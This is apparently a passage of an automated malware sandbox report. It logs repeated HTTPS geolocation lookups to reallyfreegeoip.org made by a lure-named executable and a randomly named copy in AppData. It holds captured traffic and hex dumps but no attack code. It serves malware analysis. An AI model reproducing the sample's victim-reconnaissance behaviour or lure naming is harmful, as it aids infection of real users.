                                        2024-08-29 10:16:24 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-08-29 10:16:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        4192.168.2.1049717188.114.97.34434268C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe
                                        TimestampBytes transferredDirectionData
                                        2024-08-29 10:16:24 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        Connection: Keep-Alive
                                        2024-08-29 10:16:24 UTC704INHTTP/1.1 200 OK
                                        Date: Thu, 29 Aug 2024 10:16:24 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 25167
                                        Last-Modified: Thu, 29 Aug 2024 03:16:57 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o1AKWddIhTf975VsHrx3BMJT3Y2U86vFkELOreFJEGcwRy1kYxgeHKfwPpq7%2BoHFmm7XuXKI04czRnmgEAL%2FWcGQCfnstzEgKIWbqc4iZKdkqNZMpnjRsYmBRQ4g32mABNVvwaVw"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8babc9133cb68ccc-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-08-29 10:16:24 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-08-29 10:16:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        5192.168.2.1049718188.114.97.34434268C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe
                                        TimestampBytes transferredDirectionData
                                        2024-08-29 10:16:25 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        2024-08-29 10:16:25 UTC706INHTTP/1.1 200 OK
                                        Date: Thu, 29 Aug 2024 10:16:25 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 25168
                                        Last-Modified: Thu, 29 Aug 2024 03:16:57 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SjzuC2XC53MojbN%2F1SVHz%2B0Yme0UIg%2Bm6Aycrh01FxzjoCPVSSsb4H07AW1RSxvLmSiEQI86Vliq0qT6hgULjuMD8oOJk5jmW1GUY2Xk1m6z7V8AMb03rqeUE102x3pW4dthxc9J"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8babc91828bec41b-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-08-29 10:16:25 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-08-29 10:16:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        6192.168.2.1049720188.114.97.34434820C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe
                                        TimestampBytes transferredDirectionData
                                        2024-08-29 10:16:26 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        2024-08-29 10:16:27 UTC702INHTTP/1.1 200 OK
                                        Date: Thu, 29 Aug 2024 10:16:27 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 25170
                                        Last-Modified: Thu, 29 Aug 2024 03:16:57 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2vKeQDbWn3A4pD1ssIzbyTB2HfJYUJuA4p1dKDHPh0OhHxjmRTjkgaERWfzYjzJq7loXS5k1uZ%2F62vI3rxjo6Xp9EpIBmrb5uA2kejqmBmvS5UCGL4og4wwCGMjG7BMPaGaNPXT4"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8babc92199691a24-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-08-29 10:16:27 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-08-29 10:16:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        7192.168.2.1049721188.114.97.34434268C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe
                                        TimestampBytes transferredDirectionData
                                        2024-08-29 10:16:27 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        2024-08-29 10:16:27 UTC706INHTTP/1.1 200 OK
                                        Date: Thu, 29 Aug 2024 10:16:27 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 25170
                                        Last-Modified: Thu, 29 Aug 2024 03:16:57 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zp%2FH%2BBJqXT1US1lvdgo8FXaVEsr69Qm1dUPUttqBAZIjO7KKLWbw0Ik9TKMlMhLAET5PNFpacZQCBU2J1xi6z33Cu%2Fm3zTnhYqxUGln49bQLLcyt9YVJrBJYirlYxaKurlL9QXyf"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8babc921b95c4223-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-08-29 10:16:27 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-08-29 10:16:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        8192.168.2.1049725188.114.97.34434268C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe
                                        TimestampBytes transferredDirectionData
                                        2024-08-29 10:16:29 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        2024-08-29 10:16:29 UTC704INHTTP/1.1 200 OK
                                        Date: Thu, 29 Aug 2024 10:16:29 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 25172
                                        Last-Modified: Thu, 29 Aug 2024 03:16:57 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fZGEvKIM3og304cINWNqw1t2lI81BhjrPaSACFDNTN2KNaWTYHde7Vsk0H%2FPixiZhdruerkLN3FO6q19DSdV6ukVWwJ1l5CIEtl2z%2FOptehpyIQgpX9YrhRPc3hos7X5kcSDc8N8"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8babc92ef94d3308-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-08-29 10:16:29 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-08-29 10:16:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        9192.168.2.1049726188.114.97.34434820C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe
                                        TimestampBytes transferredDirectionData
                                        2024-08-29 10:16:29 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        2024-08-29 10:16:29 UTC710INHTTP/1.1 200 OK
                                        Date: Thu, 29 Aug 2024 10:16:29 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 25172
                                        Last-Modified: Thu, 29 Aug 2024 03:16:57 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v5jlhvYZpVW98MSZGtPGG1ToHnz5c1r0aPsMAn2sHyl3HenS%2FKQs%2FwyBrFOLgPUsa3pfch92h%2BWzVBiOBy6V3eqmVmkpUyeETdtLS9g84k3FOQHcAi2%2FRKxbbr5Oto%2FrTsLCsouz"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8babc92fccb542a7-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-08-29 10:16:29 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-08-29 10:16:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        10192.168.2.1049730188.114.97.34434820C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe
                                        TimestampBytes transferredDirectionData
                                        2024-08-29 10:16:30 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        2024-08-29 10:16:30 UTC704INHTTP/1.1 200 OK
                                        Date: Thu, 29 Aug 2024 10:16:30 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 25173
                                        Last-Modified: Thu, 29 Aug 2024 03:16:57 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6VC4%2FVMmYK1dTXnOe3EUDLNHenGx5Ae7wTtoPUJmdwx9YqBfKzjr4u8X7sn6Ps1aAfuCBVxqkM7WBUZFVEIL4yzzCI3gaIppb7JA8%2Bs0Y9OLV5bdnhYhulQgFeR6iqyEcwYppxiF"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8babc937aa804271-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-08-29 10:16:30 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-08-29 10:16:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        11192.168.2.1049735188.114.97.34434268C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe
                                        TimestampBytes transferredDirectionData
                                        2024-08-29 10:16:31 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        Connection: Keep-Alive
                                        2024-08-29 10:16:31 UTC706INHTTP/1.1 200 OK
                                        Date: Thu, 29 Aug 2024 10:16:31 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 25174
                                        Last-Modified: Thu, 29 Aug 2024 03:16:57 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wF0n0npzpEUu1Gq4k%2B8GB5e3HtPQUL2CW9T6YDsmPyquSVb50fSY2qS4dlNNOhrn4OkfSEcewGifA%2BnEZ81h4HbfL7FElHfS5LQDh1I%2BPHRz8MDgnyt8dN3K3b8DFi3CrBoZBRAO"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8babc93d6e108c3f-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-08-29 10:16:31 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-08-29 10:16:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        12192.168.2.1049736188.114.97.34434820C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe
                                        TimestampBytes transferredDirectionData
                                        2024-08-29 10:16:31 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        Connection: Keep-Alive
                                        2024-08-29 10:16:31 UTC704INHTTP/1.1 200 OK
                                        Date: Thu, 29 Aug 2024 10:16:31 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 25174
                                        Last-Modified: Thu, 29 Aug 2024 03:16:57 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2A%2Fz6fyMsr918JSiQtPZbkoRSWyEp1Mlkau2bsiaVXADsffvtDGXFM0QmZKwCbwsv8C%2FOeQheSkxaTe6oO5VjpK6RSDmcO0IQZi7Gge0pSzhCdhBwfKwtTSw3xpaKUXTe21B5tYd"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8babc93f69f3c3fd-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-08-29 10:16:31 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-08-29 10:16:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        13192.168.2.1049739188.114.97.34434268C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe
                                        TimestampBytes transferredDirectionData
                                        2024-08-29 10:16:33 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        Connection: Keep-Alive
                                        2024-08-29 10:16:33 UTC714INHTTP/1.1 200 OK
                                        Date: Thu, 29 Aug 2024 10:16:33 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 25176
                                        Last-Modified: Thu, 29 Aug 2024 03:16:57 GMT
